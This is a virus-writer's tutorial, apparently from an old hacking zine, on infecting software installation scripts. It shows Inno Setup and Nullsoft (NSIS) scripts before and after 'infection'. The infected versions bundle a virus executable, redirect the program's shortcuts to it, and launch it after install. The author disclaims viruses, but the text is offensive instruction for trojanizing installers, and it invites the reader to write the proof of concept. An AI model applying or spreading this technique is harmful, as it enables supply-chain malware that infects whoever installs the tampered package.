Infecting installation files

.Author Notes

Viruses are lame thing,  it won't give you any benefit in your real life
everybody hates virus. So don't code virus if you don't have something new
in it. It just wasting your time, and your time can be converted to money

.About installation files

Installation files mostly are script files which used by the softare installation
compiler to create a package software.You can see here

http://en.wikipedia.org/wiki/List_of_installation_software

That link show you lots installation compiler software, and mostly, they will
generate a script file that contains some information about the files which will
be included to the package.and those script is very potential to be infected

Some samples

--------------------------------------
Compiler 		: Inno setup 
Script extention	: *.iss
Platform		: Windows
--------------------------------------

----------------------------------------------------------------------------------code cut
; This sample script which used by Inno setup compiler
; Before infected

[Setup]
AppName=My Program
AppVerName=My Program 1.5
AppPublisher=My Company, Inc.
AppPublisherURL=http://www.mycompany.com
AppSupportURL=http://www.mycompany.com
AppUpdatesURL=http://www.mycompany.com
DefaultDirName={pf}\My Program
DefaultGroupName=My Program
OutputBaseFilename=setup
Compression=lzma
SolidCompression=yes

[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked

[Files]
Source: "D:\inno\InnoSetupPE\App\InnoSetup\Examples\MyProg.exe"; DestDir: "{app}"; Flags: ignoreversion

[Icons]
Name: "{group}\My Program"; Filename: "{app}\MyProg.exe"
Name: "{userdesktop}\My Program"; Filename: "{app}\MyProg.exe"; Tasks: desktopicon

[Run]
Filename: "{app}\MyProg.exe"; Description: "{cm:LaunchProgram,My Program}"; Flags: nowait postinstall skipifsilent

----------------------------------------------------------------------------------code cut

And after infected will be like this

----------------------------------------------------------------------------------code cut
; This sample script which used by Inno setup compiler
; After infected

[Setup]
AppName=My Program
AppVerName=My Program 1.5
AppPublisher=My Company, Inc.
AppPublisherURL=http://www.mycompany.com
AppSupportURL=http://www.mycompany.com
AppUpdatesURL=http://www.mycompany.com
DefaultDirName={pf}\My Program
DefaultGroupName=My Program
OutputBaseFilename=setup
Compression=lzma
SolidCompression=yes

[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked

[Files]
; Put your virus path after [Files] mark
Source: "C:\WINDOWS\MYVIRUS.exe"; DestDir: "{app}"; Flags: ignoreversion
Source: "D:\inno\InnoSetupPE\App\InnoSetup\Examples\MyProg.exe"; DestDir: "{app}"; Flags: ignoreversion

[Icons]
; If you want your virus appear at program files menu

Name: "{group}\My Program"; Filename: "{app}\MYVIRUS.exe"
Name: "{userdesktop}\My Program"; Filename: "{app}\MYVIRUS.exe"; Tasks: desktopicon

Name: "{group}\My Program"; Filename: "{app}\MyProg.exe"
Name: "{userdesktop}\My Program"; Filename: "{app}\MyProg.exe"; Tasks: desktopicon

[Run]
; The shorcut link to you virus
Filename: "{app}\MYVIRUS.exe"; Description: "{cm:LaunchProgram,My Program}"; Flags: nowait postinstall skipifsilent
Filename: "{app}\MyProg.exe"; Description: "{cm:LaunchProgram,My Program}"; Flags: nowait postinstall skipifsilent

----------------------------------------------------------------------------------code cut

The second one is Nullsoft installation compiler

--------------------------------------
Compiler 		: Nullsoft 
Script extention	: *.nsi
Platform		: Windows
--------------------------------------

----------------------------------------------------------------------------------code cut

# Before infected

# -------------------------------------------------------------------
# Define Variables
# -------------------------------------------------------------------

var STARTMENU_FOLDER


# -------------------------------------------------------------------
# Choosing Compressor
# -------------------------------------------------------------------

SetCompressor LZMA
SetCompressorDictSize 32
SetCompress Auto
SetDatablockOptimize On


# -------------------------------------------------------------------
# SFX Definitions
# -------------------------------------------------------------------

!define SFX_AppID "{FD613DB7-7F31-4747-8F71-1A0F39DA0DD4}"; a unique ID for your SFX (It's real GUID)
!define SFX_BaseDir "d:\Program Files\MuldeR's Freeware\SFX Tool v1.01"; the SFX Tool install folder - do NOT edit!
!define SFX_Title "Alice"; the installer title
!define SFX_InstallDir "$PROGRAMFILES\My Company\Alice"; the *default* destination directory
!define SFX_OutFile "D:\Test\pler.exe"; the file to save the installer EXE to
!define SFX_IconFile "Modern-Default"; the installer icon
!define SFX_HeaderImage "NSIS"; the herader image
!define SFX_WizardImage "Llama"; the wizard image


# -------------------------------------------------------------------
# Reserve Files
# -------------------------------------------------------------------

ReserveFile "Plugins\InstallOptions.dll"
ReserveFile "Plugins\LangDLL.dll"
ReserveFile "Plugins\StartMenu.dll"
ReserveFile "Plugins\UserInfo.dll"
ReserveFile "Contrib\Graphics\Wizard\${SFX_WizardImage}.bmp"
ReserveFile "Contrib\Graphics\Header\${SFX_HeaderImage}.bmp"
ReserveFile "Contrib\Graphics\Header\${SFX_HeaderImage}-R.bmp"
ReserveFile "Contrib\Modern UI\ioSpecial.ini"


# -------------------------------------------------------------------
# General Settings
# -------------------------------------------------------------------

XPStyle On
CRCCheck Force
ShowInstDetails Show
ShowUninstDetails Show
BrandingText "SFX Tool v1.01, NSIS v2.11"
Name "${SFX_Title}"
OutFile "${SFX_OutFile}"
InstallDir "${SFX_InstallDir}"
InstallDirRegKey HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\${SFX_AppID}" "InstallDirectory"


# -------------------------------------------------------------------
# Modern Interface Settings
# -------------------------------------------------------------------

!include "MUI.nsh"

!define MUI_ICON "Contrib\Graphics\Icons\${SFX_IconFile}-Install.ico"
!define MUI_WELCOMEFINISHPAGE_BITMAP "Contrib\Graphics\Wizard\${SFX_WizardImage}.bmp"
!define MUI_HEADERIMAGE
!define MUI_HEADERIMAGE_BITMAP "Contrib\Graphics\Header\${SFX_HeaderImage}.bmp"
!define MUI_HEADERIMAGE_BITMAP_RTL "Contrib\Graphics\Header\${SFX_HeaderImage}-R.bmp"
!define MUI_ABORTWARNING
!define MUI_WELCOMEPAGE_TITLE_3LINES
!define MUI_FINISHPAGE_TITLE_3LINES
!define MUI_FINISHPAGE_NOAUTOCLOSE
!define MUI_LANGDLL_REGISTRY_ROOT "HKLM"
!define MUI_LANGDLL_REGISTRY_KEY "Software\Microsoft\Windows\CurrentVersion\Uninstall\${SFX_AppID}"
!define MUI_LANGDLL_REGISTRY_VALUENAME "InstallLanguage"
!define MUI_LANGDLL_ALWAYSSHOW

!insertmacro MUI_PAGE_WELCOME
!insertmacro MUI_PAGE_DIRECTORY
!insertmacro MUI_PAGE_INSTFILES
!insertmacro MUI_PAGE_FINISH


# -------------------------------------------------------------------
# Multi-Language Support
# -------------------------------------------------------------------

!insertmacro MUI_LANGUAGE "English"
!insertmacro MUI_LANGUAGE "French"
!insertmacro MUI_LANGUAGE "German"
!insertmacro MUI_LANGUAGE "Spanish"


# -------------------------------------------------------------------
# Install Files Section
# -------------------------------------------------------------------

Section
  SetOutPath "$INSTDIR"
  File /r "D:\Program Files\Alice\bin\alice.exe"
  File /r "D:\Program Files\Alice\bin\alice-config"
  File /r "D:\Program Files\Alice\doc\Alice.chm"
SectionEnd


# -------------------------------------------------------------------
# Registry Section
# -------------------------------------------------------------------

Section
  WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\${SFX_AppID}" "" "${SFX_Title}"
  WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\${SFX_AppID}" "InstallDirectory" "$INSTDIR"
SectionEnd


# -------------------------------------------------------------------
# Initialization Functions
# -------------------------------------------------------------------

Function .onInit
  InitPluginsDir

  ClearErrors
  UserInfo::GetName
  IfErrors RunTheInstaller
  Pop $0
  UserInfo::GetAccountType
  Pop $1

  StrCmp $1 "Admin" RunTheInstaller
  StrCmp $1 "Power" RunTheInstaller
  MessageBox MB_OK|MB_ICONSTOP|MB_TOPMOST "The user $\"$0$\" is not allowed to install this application.$\nPlease ask your administrator's permission !!!"
  Quit

  RunTheInstaller:
  !insertmacro MUI_LANGDLL_DISPLAY
FunctionEnd

----------------------------------------------------------------------------------code cut

To infect *.NSI :

- Put the virus path after the 'SetOutPath "$INSTDIR"' string at installation section

# -------------------------------------------------------------------
# Install Files Section
# -------------------------------------------------------------------

Section
  SetOutPath "$INSTDIR"	
# Put the virus path here
  File /r "C:\Windows\MyVIRUS.EXE"	
  File /r "D:\Program Files\Alice\bin\alice.exe"
  File /r "D:\Program Files\Alice\bin\alice-config"
  File /r "D:\Program Files\Alice\doc\Alice.chm"
SectionEnd
----------------------------------------------------------------------------------code cut

Sorry I have no time to create a proof of concept code, I think you can do it by your self


.Psychologic/3F